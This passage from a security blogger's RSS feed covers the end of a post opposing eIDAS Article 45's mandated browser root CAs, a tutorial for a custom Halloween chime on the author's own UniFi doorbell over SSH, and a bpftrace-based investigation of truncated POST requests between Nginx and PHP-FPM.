and we could all just not buy them. The problem is that there&apos;s something bigger lurking that really concerns me.</p><p></p><h4 id="my-concerns">My Concerns</h4><p>This isn&apos;t all just talk for me: having dedicated a huge portion of my life to working in this industry, and being so passionate about it, this worries me. It worries me enough that I&apos;ve signed multiple open letters speaking out against this, with the most recent <a href="https://last-chance-for-eidas.org/?ref=scotthelme.co.uk" rel="noreferrer">just a few days ago</a>, and I&apos;ve even travelled to Brussels to sit alongside Member of European Parliament Karen Melchior, and other industry representatives, to <a href="https://securityriskahead.eu/wp-content/uploads/2022/11/Press-release-event-on-cybersecurity-risks-within-the-eIDAS-revision.pdf?ref=scotthelme.co.uk" rel="noreferrer">speak against this</a>. 
I have absolutely no skin in this game, one way or another, but I&apos;ve seen something that I believe is just fundamentally wrong, and I feel compelled to speak out against it.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-17.png" class="kg-image" alt="What the QWAC?!" loading="lazy" width="643" height="382" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-17.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-17.png 643w"></figure><p></p><h4 id="eidas-article-45latest-recitals">eIDAS Article 45 - latest recitals</h4><p>As we come towards the end of the legal process, we&apos;re closing in on the final revisions and final draft of some new regulation coming to the EU called <a href="https://digital-strategy.ec.europa.eu/en/policies/eidas-regulation?ref=scotthelme.co.uk" rel="noreferrer">eIDAS</a>. This new regulation contains many things, and it&apos;s only one small part of it that I fundamentally oppose, but it will have global impact, far beyond the borders of any member state of the EU.</p><p>Alongside introducing the concept of a QWAC, discussed in my previous blog post, eIDAS is also going to introduce some very concerning requirements that affect the Internet PKI. At the top of my list of concerns is that browser and client vendors (Root Store Operators) will have a legal obligation to add Government-mandated Root Certificate Authorities to their Root Stores, bypassing existing approval mechanisms. </p><p>Yep, you read that right. Government-mandated Root Certificate Authorities...</p><p>I could end this blog post right here because anyone reading this will understand the significance of such a statement, and just how much of a catastrophically bad idea that is, but it gets worse. There will also be restrictions placed on Root Store Operators around handling incidents at those Root CAs and possibly removing trust in them for wrongdoing. I cannot stress this enough, so I&apos;m going to say it again: this is a terrible idea.</p><p></p><h4 id="how-it-works-now">How it works now</h4><p>The system that we have now is not perfect, by any stretch of the imagination, but it has been improved so much over the years, with tireless work from the industry, that where we are now, finally, is a good place.</p><p>A browser or device vendor like Apple has a collection of Trusted Root Certificate Authorities that their devices will trust, and in turn, those devices will trust any certificates issued by those Trusted Root CAs. If you want to join this collection of Trusted Root CAs, you have to apply to join the <a href="https://www.apple.com/certificateauthority/ca_program.html?ref=scotthelme.co.uk" rel="noreferrer">Apple Root Certificate Program</a> and pass some very strict requirements. Of course, this makes sense, because being a Trusted Root CA is a massive responsibility that gives you an enormous amount of power, and Apple want to make sure that their customers aren&apos;t going to come to any harm because of your actions. 
The same goes for all such Root Store Operators like <a href="https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/policy/?ref=scotthelme.co.uk" rel="noreferrer">Mozilla</a>, <a href="https://www.chromium.org/Home/chromium-security/root-ca-policy/?ref=scotthelme.co.uk" rel="noreferrer">Chrome</a>, <a href="https://learn.microsoft.com/en-us/security/trusted-root/program-requirements?ref=scotthelme.co.uk" rel="noreferrer">Microsoft</a> and many others that operate Trusted Root Programs for their own devices or software. It is in the interest of the software/device vendor to make sure that a Root CA is capable of operating properly because, if not, all of that vendor&apos;s customers are at serious risk of having their traffic intercepted and decrypted. So, for Apple, their concern is that if a Root CA makes a mistake, the potential outcome is that everyone using an iPhone could have the security of all of their traffic compromised! That&apos;s a serious risk, and it&apos;s why organisations like Apple take the process of approving Trusted Root CAs so damn seriously.</p><p>This is the existing approval mechanism that will be bypassed by this new legislation, and the Root Store Operators will be required to accept these European Root CAs without the ability to scrutinise them or reject their inclusion.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/CABForum_logo.png" class="kg-image" alt="What the QWAC?!" loading="lazy" width="426" height="93"></figure><p></p><h4 id="how-its-going-to-work">How it&apos;s going to work</h4><p>I have access to the near-final text of the regulation, which is not yet public, but was leaked to me by a confidential source. I&apos;ve been looking through the proposed changes and I still see all of the things that have concerned me throughout this entire process. Here are a few snippets from the hundreds of pages that I&apos;ve read through that still demonstrate my concerns. These snippets outline the definition of a QWAC and the requirement that they be held against the standards set out in the legislation:</p><p></p><blockquote>&#x2018;qualified certificate for website authentication&#x2019; means a certificate for website authentication, which is issued by a qualified trust service provider and meets the requirements laid down in Annex IV;</blockquote><blockquote>Qualified certificates for website authentication shall meet the requirements laid down in Annex IV.</blockquote><blockquote>Evaluation of compliance with those requirements shall be carried out in accordance with the standards and the specifications referred to in paragraph 3.</blockquote><p></p><p>But if that isn&apos;t clear enough for you, the legislation goes on to say:</p><p></p><blockquote>Qualified certificates for website authentication issued in accordance with paragraph 1 shall be recognised by web-browsers. Web-browsers shall ensure that the identity data attested in the certificate and additional attested attributes are displayed in a user-friendly manner. Web-browsers shall ensure support and interoperability with qualified certificates for website authentication referred to in paragraph 1</blockquote><p></p><p>That&apos;s pretty clear, and we can still see the same concerns I raised previously about the legislation controlling not only support for, and use of, the Government-mandated Root CAs, but even the UI of the browser itself. 
It goes on:</p><p></p><blockquote>National trusted lists should confirm the qualified status of website authentication services and of their trust service providers, including their full compliance with the requirements of this Regulation with regards to the issuance of qualified certificates for website authentication. Recognition of QWACs means that the providers of web-browsers should not deny the authenticity of qualified certificates for website authentication attesting the link between the website domain name and the natural or legal person to whom the certificate is issued and confirming the identity of that person. Providers of web-browsers should display in a user-friendly manner the certified identity data and the other attested attributes to the end-user, in the browser environment, by relying on technical implementations of their choice. To that end, providers of web-browsers should ensure support and interoperability with qualified certificates for website authentication issued in full compliance with the requirement of this Regulation.</blockquote><p></p><p>Again, pressing this idea of a list of Trusted Root CAs that the client vendors must accept and &quot;should not deny the authenticity of&quot;. Then, with regards to limiting the ability of a Root Store Operator to audit the behaviour of a Trusted Root CA on an ongoing basis:</p><p></p><blockquote>In order to contribute to the online security of end-users, providers of web-browsers should be able to take measures, in exceptional circumstances, that are both necessary and proportionate in reaction to substantiated concerns on breaches of security or loss of integrity of an identified certificate or set of certificates. In this case, while taking any such precautionary measures, web browsers should notify without undue delay the national supervisory body and the Commission, the entity to whom the certificate was issued and the qualified trust service provider that issued that certificate or set of certificates of any such concern of a security breach as well as the measures taken relating to a single certificate or a set of certificates. These measures, should be without prejudice to the obligation of the browsers to recognize qualified website authentication certificates in accordance with the national trusted lists.</blockquote><p></p><p>Then, just to make sure we don&apos;t have any tremendously beneficial technologies like <a href="https://scotthelme.co.uk/tag/certificate-transparency/?ref=scotthelme.co.uk" rel="noreferrer">Certificate Transparency</a> protecting us, it is clarified that:</p><p></p><blockquote>Qualified certificates for website authentication shall not be subject to any mandatory requirements other than the requirements laid down in paragraph 1.</blockquote><p></p><p>Paragraph 1, of course, does not make any mention of Certificate Transparency. All of these points are then summarised in a newly added section with the title &quot;Cybersecurity precautionary measures&quot;: </p><p></p><blockquote>1.	Web-browsers shall not take any measures contrary to their obligations set out in Art 45, notably the requirement to recognise Qualified Certificates for Web Authentication, and to display the identity data provided in a user friendly manner.</blockquote><p></p><blockquote>2.	
By way of derogation to paragraph 1 and only in case of substantiated concerns related to breaches of security or loss of integrity of an identified certificate or set of certificates, web-browsers may take precautionary measures in relation to that certificate or set of certificates</blockquote><p></p><blockquote>3.	Where measures are taken, web-browsers shall notify their concerns in writing without undue delay, jointly with a description of the measures taken to mitigate those concerns, to the Commission, the competent supervisory authority, the entity to whom the certificate was issued and to the qualified trust service provider that issued that certificate or set of certificates. Upon receipt of such a notification, the competent supervisory authority shall issue an acknowledgement of receipt to the web-browser in question.</blockquote><p></p><blockquote>4.	The competent supervisory authority shall consider the issues raised in the notification in accordance with Article 17(3)(c). When the outcome of that investigation does not result in the withdrawal of the qualified status of the certificate(s), the supervisory authority shall inform the web-browser accordingly and request it to put an end to the precautionary measures referred to in paragraph 2.</blockquote><p></p><h4 id="the-industry-speaks-out">The industry speaks out</h4><p>It&apos;s not just me that thinks this is a bad idea though, of course; I&apos;m just adding my voice to the chorus of others from across the industry.</p><p></p><ol><li>Mozilla set up the <a href="https://securityriskahead.eu/?ref=scotthelme.co.uk" rel="noreferrer">Security Risk Ahead</a> website with lots of details.</li><li>The Chrome Security Team has called for change in <a href="https://security.googleblog.com/2023/11/qualified-certificates-with-qualified.html?ref=scotthelme.co.uk" rel="noreferrer">Qualified certificates with qualified risks</a>.</li><li>You can head over to <a href="https://last-chance-for-eidas.org/?ref=scotthelme.co.uk">https://last-chance-for-eidas.org/</a> to read more about the risks.</li><li>You can read our latest open letter with 400+ signatures so far. <a href="https://eidas-open-letter.org/?ref=scotthelme.co.uk">https://eidas-open-letter.org/</a></li></ol><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/zU7C5hOn_400x400.jpg" class="kg-image" alt="What the QWAC?!" loading="lazy" width="400" height="400"></figure><p></p><p>The thing that it will always come down to for me, and the thing that you can use to guide your decisions, is to look at the interests of the parties involved. I&apos;ve long been critical of many CAs for shitty marketing and shady practices, and it seems that&apos;s continuing. The organisations and voices speaking out in support of QWACs and Article 45 are those that are going to be able to sell them for $$$ once this comes to pass. The organisations and voices speaking out against QWACs and Article 45 are those with an interest in preserving and improving the security of the ecosystem we&apos;ve worked so hard to build. 
I have nothing to gain here by swaying your opinion, but you sure as hell have a lot to lose.</p><p></p><h4 id="what-do-we-do-about-it">What do we do about it?</h4><p>I&apos;ll quote the following snippet from the &apos;Last Chance&apos; <a href="https://last-chance-for-eidas.org/?ref=scotthelme.co.uk#what-next" rel="noreferrer">website</a>:</p><blockquote>If you&#x2019;re a European citizen, you can write to the member of the European Parliament responsible for the <a href="https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?reference=2021%2F0136%28COD%29&amp;l=en&amp;ref=scotthelme.co.uk" rel="noreferrer">eIDAS file</a> - <a href="https://www.europarl.europa.eu/meps/en/112747/ROMANA_JERKOVIC/home?ref=scotthelme.co.uk" rel="noreferrer">Romana JERKOVI&#x106;</a> - and register your concern.</blockquote><blockquote>If you&#x2019;re a cybersecurity expert, researcher or represent an NGO, consider signing the open letter at <a href="https://eidas-open-letter.org/?ref=scotthelme.co.uk" rel="noreferrer">https://eidas-open-letter.org</a>.</blockquote><p></p><p>In truth, I don&apos;t know what else to do next, but I believe we have to do something. If these Qualified Trust Service Providers (QTSP is the name given to a CA that issues QWACs) are all they&apos;re cracked up to be, then why can&apos;t they just submit to the existing audit/approval process and pass with flying colours?.. That&apos;s not too much to ask, is it?</p><p></p><h4 id="additional-information-and-reading">Additional information and reading</h4><p><a href="https://sslmate.com/resources/certificate_authority_failures?ref=scotthelme.co.uk" rel="noreferrer">Timeline of Certificate Authority Failures</a> - why Trust Store Operators need the ability to audit and remove Root CAs.</p><p><a href="https://www.european-signature-dialog.eu/ESD_answer_to_Mozilla_misinformation_campaign.pdf?ref=scotthelme.co.uk" rel="noreferrer">Mozilla website pushes serious eIDAS misinformation to political decision makers and public</a> - The ESD (<a href="https://ec.europa.eu/transparencyregister/public/consultation/displaylobbyist.do?id=994150833943-81&amp;ref=scotthelme.co.uk#scrollNav-13" rel="noreferrer">a group of CAs</a>) produced this laughable document. 
It closes by pointing out that Google and Mozilla are &quot;investors&quot; in Let&apos;s Encrypt who are &quot;in competition with all QTSPs&quot; &#x1F602; (a QTSP is a CA that issues QWACs)</p><p>Digital rights organisation epicenter.works had <a href="https://epicenter.works/en/content/eu-digital-identity-reform-the-good-bad-ugly-in-the-eidas-regulation?ref=scotthelme.co.uk#:~:text=to%20this%20information.-,The%20Ugly,-QWACs" rel="noreferrer">this</a> to say about QWACs.</p><p>You should read what <a href="https://alecmuffett.com/article/108139?ref=scotthelme.co.uk" rel="noreferrer">Alec Muffett</a> has to say on eIDAS/QWACs.</p><p>This informative Tweet from <a href="https://x.com/rmhrisk/status/1721329896746848353?s=46&amp;t=Ms_J84N8ypSKLl6M43cBnQ&amp;ref=scotthelme.co.uk" rel="noreferrer">Ryan Hurst</a> is also a great start for info on the Internet PKI.</p><p><em>Update 19:10 UTC 7th Nov</em>: The EFF have just published something on this, <a href="https://www.eff.org/deeplinks/2023/11/article-45-will-roll-back-web-security-12-years?ref=scotthelme.co.uk" rel="noreferrer">Article 45 Will Roll Back Web Security by 12 Years</a>, and as you would expect, it&apos;s well written and makes a lot of sense!</p><p> </p>]]></content:encoded></item><item><title><![CDATA[Holiday fun with my UniFi G4 Doorbell Pro!]]></title><description><![CDATA[<p>I love having smart devices around my house, and every now and then, you can have a little bit of fun with them too! Here&apos;s what it currently looks like from the outside of my house for Halloween.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg" class="kg-image" alt loading="lazy" width="2000" height="1500" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/IMG_6162-1.jpeg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/IMG_6162-1.jpeg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/IMG_6162-1.jpeg 1600w, https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg 2048w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="custom-doorbell-sounds">Custom doorbell sounds</h4><p>As Halloween has arrived, I thought it</p>]]></description><link>https://scotthelme.co.uk/holiday-fun-with-my-unifi-g4-doorbell-pro/</link><guid isPermaLink="false">65413a2c264b070001029a78</guid><category><![CDATA[UniFi]]></category><category><![CDATA[Protect]]></category><category><![CDATA[G4 Doorbell Pro]]></category><category><![CDATA[Halloween]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Tue, 31 Oct 2023 18:27:23 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/10/IMG_6162.jpeg" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/10/IMG_6162.jpeg" alt="Holiday fun with my UniFi G4 Doorbell Pro!"><p>I love having smart devices around my house, and every now and then, you can have a little bit of fun with them too! Here&apos;s what it currently looks like from the outside of my house for Halloween.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg" class="kg-image" alt="Holiday fun with my UniFi G4 Doorbell Pro!" 
loading="lazy" width="2000" height="1500" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/IMG_6162-1.jpeg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/IMG_6162-1.jpeg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/IMG_6162-1.jpeg 1600w, https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg 2048w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="custom-doorbell-sounds">Custom doorbell sounds</h4><p>As Halloween has arrived, I thought it might nice to style the outside of my house using all of the RGB exterior lighting I&apos;ve installed, and to play a custom sound from the doorbell when visitors press the button. It&apos;s pretty quick to do this and you might spend most of the time finding a suitable audio file to play when the button is pressed!</p><p></p><h4 id="enable-ssh-on-your-unifi-console">Enable SSH on your UniFi Console</h4><p>The first thing you need to do is setup SSH access on your UniFi Console. This could be a UDM Pro, a CloudKey, or, like me, a UniFi NVR device. You can find specific instructions on how to do this here: <a href="https://help.ui.com/hc/en-us/articles/204909374-UniFi-Connect-with-SSH-Advanced?ref=scotthelme.co.uk">https://help.ui.com/hc/en-us/articles/204909374-UniFi-Connect-with-SSH-Advanced</a></p><p></p><p>Once you have SSH access to your console, connect using the default credentials, or any specific ones you set, and modify the following file to enable SSH access on your devices like cameras and doorbells:</p><p><s><code>vi /srv/unifi-protect/config.json</code></s></p><p><em>Update Nov 2023</em>: The file path changed.<br> <code>vi /etc/unifi-protect/config.json</code></p><p></p><p>If the file doesn&apos;t exist, you can create it and add the following content:</p><pre><code>{
 &quot;enableSsh&quot;: true
}</code></pre><p></p><p>If the file does exist, you can edit it and add the required config, making sure to keep the syntax in the JSON file valid.</p><pre><code>{
 &quot;someExistingKey&quot;: &quot;someExistingValue&quot;,
 &quot;enableSsh&quot;: true
}</code></pre><p></p><p>Now restart the UniFi Protect service to load the new configuration.</p><p><code>systemctl restart unifi-protect</code></p><p></p><h4 id="connect-to-the-doorbell-via-ssh">Connect to the Doorbell via SSH</h4><p>You can now test the connection to your doorbell for which you will need to know the IP address, which can be found in the &apos;UniFi Devices&apos; list in Protect. Here is the SSH command to connect, just substitute my IP address with yours:</p><p><code>ssh ubnt@192.168.1.140</code></p><p></p><p>You will be asked for a password and the password for the device can be found in the Protect dashboard by going to Settings -&gt; System and clicking &apos;Reveal&apos; under the &apos;Recovery Code&apos; heading.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-4.png" class="kg-image" alt="Holiday fun with my UniFi G4 Doorbell Pro!" loading="lazy" width="628" height="196" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-4.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-4.png 628w"></figure><p></p><p>I was automatically dropped into the correct folder when I connected to the doorbell, but just to make sure, you can use this command to make sure you&apos;re in the right place:</p><p><code>cd /var/etc/persistent</code></p><p></p><h4 id="set-up-your-custom-chime-sound">Set up your custom chime sound!</h4><p>You can now edit the configuration file in this folder to make the changes on the doorbell that we need to make for our custom sound:</p><p><code>vi ubnt_sounds_leds.conf</code></p><p></p><p>The path we need to change is <code>sounds_ring_button</code> and I also took the opportunity to change <code>speakerVolume</code> to <code>100</code> while I was here!</p><pre><code>{
  &quot;customSounds&quot;: {
    &quot;sounds_ring_button&quot;: &quot;../../../../../../var/etc/sounds/custom.wav&quot;
  },
  ...
  &quot;speakerVolume&quot;: 100,
  ...
}</code></pre><p></p><p>The final piece of the puzzle is to copy over your WAV file to the doorbell and put it in the right folder:</p><p><code>/var/etc/sounds/custom.wav</code></p><p></p><p>You will need to update the filename if you don&apos;t call it <code>custom.wav</code> and you can copy it over using an <code>scp</code> command or a tool like WinSCP if you&apos;re more comfortable with that:</p><p><code>scp custom.wav ubnt@192.168.1.140:/var/etc/sounds/custom.wav</code></p><p></p><p>Now all that&apos;s left is to restart the correct process by finding its <code>pid</code>, and you&apos;re good to go. Here is how you find the <code>pid</code>:</p><p><code>ps | grep ubnt_sounds_leds</code></p><p></p><p>It will give you output similar to this, and the <code>pid</code> for <code>ubnt_sounds_leds</code> is the first number on the line, so for me it was <code>2560</code>, but it will be different for you:</p><pre><code> 2560 ui        159m S    /bin/ubnt_sounds_leds
 6710 ui        2968 S    grep leds</code></pre><p></p><p>You can then kill the process, which will be restarted for you automatically, by using this command and replacing my <code>pid</code> with yours:</p><p><code>kill -TERM 2560</code></p><p></p><p>That&apos;s it, go and hit the button!!</p><p></p>
<!--kg-card-begin: html-->
<iframe width="464" height="825" src="https://www.youtube.com/embed/xAn760nVRCY" title="Custom Halloween Chime for UniFi G4 Doorbell Pro" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
<!--kg-card-end: html-->
<p></p><p></p><p>I&apos;m planning to utilise this again for Christmas and perhaps just for a little more fun throughout the year too. My 10-year-old also wants to know if the doorbell can play fart sounds... &#x1F602;</p><p></p>]]></content:encoded></item><item><title><![CDATA[Sockets - Under The Hood: Understanding Truncated Request Behaviour]]></title><description><![CDATA[<p>I&apos;m thoroughly pleased to be able to say that I <em>finally</em> understand the issue that&apos;s been bothering me on <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> for a few weeks now, and this is the blog post that&apos;s going to explain everything!</p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/10/Logo-01.jpg" class="kg-image" alt loading="lazy" width="2000" height="1125" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/Logo-01.jpg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/Logo-01.jpg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/Logo-01.jpg 1600w, https://scotthelme.co.uk/content/images/size/w2400/2023/10/Logo-01.jpg 2400w" sizes="(min-width: 720px) 720px"></a></figure><h4 id="report-uri">Report URI</h4><p>If you haven&apos;t</p>]]></description><link>https://scotthelme.co.uk/sockets-under-the-hood/</link><guid isPermaLink="false">65255efa3bbd1300019f7fe2</guid><category><![CDATA[Report URI]]></category><category><![CDATA[PHP]]></category><category><![CDATA[truncated-post-requests]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 16 Oct 2023 14:09:22 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/10/background-backlog.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/10/background-backlog.png" alt="Sockets - Under The Hood: Understanding Truncated Request Behaviour"><p>I&apos;m thoroughly pleased to be able to say that I <em>finally</em> understand the issue that&apos;s been bothering me on <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> for a few weeks now, and this is the blog post that&apos;s going to explain everything!</p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/10/Logo-01.jpg" class="kg-image" alt="Sockets - Under The Hood: Understanding Truncated Request Behaviour" loading="lazy" width="2000" height="1125" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/Logo-01.jpg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/Logo-01.jpg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/Logo-01.jpg 1600w, https://scotthelme.co.uk/content/images/size/w2400/2023/10/Logo-01.jpg 2400w" sizes="(min-width: 720px) 720px"></a></figure><h4 id="report-uri">Report URI</h4><p>If you haven&apos;t read the first two blog posts related to this issue, it might help you to get some background on what I&apos;m going to be talking about here:</p><p><a href="https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/?ref=scotthelme.co.uk" rel="noreferrer">Unravelling The Mystery Of Truncated POST Requests On Report URI</a> <br><br><a href="https://scotthelme.co.uk/processing-truncated-requests-php-debugging-deep-dive/?ref=scotthelme.co.uk" rel="noreferrer">Processing Truncated Requests? 
A PHP Debugging Deep Dive</a></p><p></p><p>This weird behaviour of our application receiving and then trying to process truncated POST requests has led me on quite a journey of learning, and I can finally explain what&apos;s happening!</p><p></p><h4 id="the-story-so-far">The Story So Far</h4><p>In the previous blog posts, I&apos;d narrowed it down to <em>what</em> was happening, but not <em>why</em> it was happening, and I was still stumped. After patching PHP, I could see it was calling <code>read()</code> on the socket and reading until <code>0</code> was returned, but <code>0</code> was being returned earlier than expected.</p>
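<p></p><p>The shape of that read loop, translated into illustrative PHP rather than the actual C source of PHP-FPM, is something like this:</p><pre><code class="language-php">&lt;?php
// Illustrative sketch of the read loop (not the real PHP-FPM source):
// keep reading until read() returns 0 (EOF). If the peer closes the
// socket early, 0 arrives before $contentLength bytes have been read
// and we&apos;re left holding a truncated request body.
function readBody($socket, int $contentLength): string
{
    $body = &apos;&apos;;
    while (strlen($body) &lt; $contentLength) {
        $chunk = socket_read($socket, 16384);
        if ($chunk === false || $chunk === &apos;&apos;) {
            break; // 0 bytes read: the socket was closed, the body is truncated
        }
        $body .= $chunk;
    }
    return $body;
}</code></pre><p></p>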
<p>Here&apos;s the log of the behaviour from the previous blog post.</p><p></p><pre><code class="language-log">Sep 29 20:23:31 test-server php: Accepted connection: 0ce264eae07198c3c59ae90d04127c39
Sep 29 20:23:31 test-server php: Read 16384 bytes (1024737 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (1008353 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (991969 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (975585 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (959201 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (942817 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (926433 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (910049 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (893665 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (877281 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (860897 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (844513 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (828129 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: errno 0: Success
Sep 29 20:23:31 test-server php: Read 0 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: POST data reading complete. Size: 229376 bytes (out of 1041121 bytes)</code></pre><p></p><p></p><p>I knew that Nginx was receiving the full request, so the problem was happening in the <code>fastcgi_pass</code> to PHP-FPM, but I couldn&apos;t wrap my head around the circumstances. I wanted to understand more about the underlying mechanics of how Nginx was talking to PHP and, more specifically, what was failing in that process.</p><p></p><h4 id="bpftrace">bpftrace</h4><p>In the last blog, I had to get familiar with <code>strace</code> for the first time, and this time around, I&apos;d asked for some assistance from <a href="https://twitter.com/ignatkn?ref=scotthelme.co.uk" rel="noreferrer">Ignat Korchagin</a>, who kindly whipped up several <code>bpftrace</code> commands and could also reliably reproduce the issue. Hopefully, by monitoring things a little more closely between Nginx and PHP, I could gain an understanding of precisely what was happening.</p><p>After monitoring my test server when the issue was happening, I could see Nginx hitting <code>EAGAIN</code> (<a href="https://man7.org/linux/man-pages/man3/errno.3.html?ref=scotthelme.co.uk#:~:text=POSIX.1%2D2001).-,EAGAIN,-Resource%20temporarily%20unavailable" rel="noreferrer">source</a>) when trying to write to the socket, and I could see PHP getting <code>EPIPE</code> (<a href="https://man7.org/linux/man-pages/man3/errno.3.html?ref=scotthelme.co.uk#:~:text=family%20not%20supported.-,EPIPE,-Broken%20pipe%20(POSIX" rel="noreferrer">source</a>) when trying to read from the socket, but it still wasn&apos;t clear to me how that was occurring. The kernel returns these as negative errno values, so in the output below, <code>-11</code> is <code>EAGAIN</code> and <code>-32</code> is <code>EPIPE</code>. The <code>EAGAIN</code> error is likely because the socket buffer is full when Nginx is sending, so it can&apos;t send any more data, and the <code>EPIPE</code> comes when PHP tries to read from the socket that has since been closed by Nginx. Here&apos;s the command.</p><p></p><pre><code class="language-bash">$ bpftrace -e &apos;kretfunc:unix_stream_sendmsg /retval &lt; 0/ { printf(&quot;%d\n&quot;, retval); }&apos;
Attaching 1 probe...
-11
-11
[-11 repeated 20x]
-11
-11
-32
-32
[-32 repeated 12x]
-32
-32</code></pre><p></p><p></p><p>The log reads like Nginx is trying to write to the socket which has a full buffer, and PHP is trying to read from a socket that&apos;s closed, but if PHP has called <code>accept()</code>, why would it not be able to <code>read()</code>? The <code>accept()</code> call is followed by <code>read()</code> calls in the PHP source almost immediately so it didn&apos;t make sense. I also saw 12x <code>EPIPE (-32)</code> errors coming from PHP and I had exactly 12x truncated payload errors in <code>syslog</code> using the same logging from the previous blog post.</p><p>Digging a little deeper, I wanted to see when the calls to <code>connect()</code> and <code>accept()</code> were being made.</p><p></p><pre><code class="language-bash">$ bpftrace -e &apos;tracepoint:syscalls:sys_enter_connect /comm == &quot;nginx&quot;/ { printf(&quot;connect: %s\n&quot;, strftime(&quot;%H:%M:%S:%f&quot;, nsecs)); } tracepoint:syscalls:sys_enter_accept /comm == &quot;php-fpm8.2&quot;/ { printf(&quot;accept: %s\n&quot;, strftime(&quot;%H:%M:%S:%f&quot;, nsecs)); }&apos;</code></pre><p></p><p></p><p>After firing another batch of 20 requests, I could see all of the <code>connect()</code> calls from nginx happen right away, but the <code>accept()</code> calls from PHP were much more spaced out.</p><p></p><pre><code class="language-log">Attaching 2 probes...
connect: 10:42:27:244851
connect: 10:42:27:576388
connect: 10:42:27:643525
connect: 10:42:27:750282
connect: 10:42:27:923155
connect: 10:42:28:054478
connect: 10:42:28:419101
accept: 10:42:28:522173
connect: 10:42:28:716231
connect: 10:42:29:129984
connect: 10:42:29:146868
connect: 10:42:29:240262
connect: 10:42:29:307529
connect: 10:42:29:310247
accept: 10:42:29:523505
connect: 10:42:29:825400
connect: 10:42:29:832304
connect: 10:42:29:978008
connect: 10:42:30:155472
connect: 10:42:33:271992
connect: 10:42:35:891986
connect: 10:42:37:164266
accept: 10:42:37:257787
accept: 10:42:37:588539
accept: 10:42:38:534605
accept: 10:42:39:534456
accept: 10:42:47:260393
accept: 10:42:47:590909
accept: 10:42:48:537622
accept: 10:42:49:536993
accept: 10:42:57:263766
accept: 10:42:57:593434
accept: 10:42:58:540436
accept: 10:42:59:539849
accept: 10:43:07:267292
accept: 10:43:07:595731
accept: 10:43:08:543073
accept: 10:43:09:542913
accept: 10:43:17:271296
accept: 10:43:17:598086</code></pre><p></p><p></p><p>I still wasn&apos;t clear on how this was working because PHP is calling <code>accept()</code> and <code>read()</code> very close together, so if PHP can accept, why is the read failing with a partial payload?!</p><p></p><pre><code class="language-log">Oct 12 10:42:47 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:47 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:48 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:49 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:57 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:57 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:58 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:59 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:07 test-server php: JSON decode failed: 1041121 229376
